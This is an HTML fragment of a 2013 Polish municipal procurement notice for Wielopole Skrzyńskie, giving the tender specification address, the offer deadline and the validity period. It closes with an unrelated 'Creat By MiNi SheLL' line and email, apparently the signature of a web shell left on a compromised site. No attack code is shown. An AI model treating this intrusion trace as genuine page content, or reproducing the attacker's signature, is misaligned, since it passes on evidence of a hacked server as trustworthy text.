<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wielopole Skrzyńskie
39-110 Wielopole Skrzyńskie 200
pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2013 godzina 10:00, miejsce: Gmina Wielopole Skrzyńskie
39-110 Wielopole Skrzyńskie 200
sekretariat, pok nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com